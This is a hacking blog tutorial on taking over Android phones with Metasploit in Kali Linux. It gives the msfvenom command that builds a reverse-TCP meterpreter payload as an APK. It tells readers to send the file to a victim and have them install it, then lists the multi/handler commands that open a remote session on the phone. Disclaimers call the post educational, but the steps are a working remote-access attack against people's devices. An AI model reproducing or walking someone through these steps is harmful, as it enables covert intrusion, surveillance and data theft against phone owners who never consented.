Exploiting Android Devices using Metasploit in Kali Linux

Hello Tech Kiddies. Here is another tutorial of exploiting android devices. In this post, I will demonstrate how to exploit android devices using the popular metasploit framework which is available in Kali Linux.

What is Metasploit Framework

The Metasploit is an open source framework which contains lots of exploits. The metasploit project offers penetration testing software and provide tools for automating the comparison of a program’s vulnerability and its patched version.

The metasploit framework includes more than 1673 exploits, 959 auxiliary modules, 294 post exploitation modules and 489 payloads in its database. Exploit modules are run against a target to check wheather its vulnerable or not.

Don't Miss - Top10 Powerfull Dos/DDoS Attacking Tools for Linux, Windows & Android
All articles on our website are only for Educational/Informational purposes only. The author is not responsile for any illegal activity. TheHackerStuff does not promote any malicious activites.
Exploiting Android using Metasploit Framework
Requirements –
  • System with Kali installed.
  • Knowledge of basic Linux.
  • Internet Connectivity.
  • Android device to test.

Let’s start with exploiting.

Create a Payload

Create a payload using msfvenom –

Open terminal and type the below command

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.5 lport=7777 -i 3 > hack.apk

-p stands for payload which we are using.

lhost – Replace 192.168.1.5 with your own local IP. You can find by typing ifconfig.

lport – This is the port number through which the connection will establish.

-i stands for number of iterations the payload will be encoded.

The payload will get ready after executing the above command. You can find the payload in home directory.

Send the payload to the victim. Let the victim to install tha payload. Once the installation of the payload is done.


Fire Metasploit Framework

Open new terminal and fire up Metasploit Framework by typing msfconsole.

It will take some time to start. Once it starts.

Don't miss - Top10 Powerfull Hacking Android Apps Used By Hackers

Setting Up Listener

Type below commands for setting up listener. First load the multi-handler by typing the below command.

use exploit/multi/handler

Setup a reverse payload by typing

set payload android/meterpreter/reverse_tcp

Set the lhost with your own local IP.

set lhost 192.168.1.5

Set the port number.

set lport 7777

Don't miss - How To Gain Admin Access using a Guest Account in Windows 10
Exploit (Start the Listener)

The final step, start the listener by typing

exploit

Hacked!!!! It will open an meterpreter session. Now do whatever you want.

To list down the sessions. Type “sessions -i”.

To connect to the session. Type “session number”.

Note – This attack works within the network.


Do you want to write for TheHackerStuff ? If you have an interesting and intelligent topic you think we would like to publish, send it to thehackerstuff@gmail.com

Disclaimer

This article is only for an Educational purpose. Any actions and or activities related to the material contained within this Website is solely your responsibility.The misuse of the information in this website can result in criminal charges brought against the persons in question. The authors and www.thehackerstuff.com  will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.

Akshay Sharma

Akshay Sharma is a Cyber Security Analyst. He is a CCNA certified and owner of TheHackerStuff.

One thought on “Exploiting Android Devices using Metasploit in Kali Linux

Leave a Reply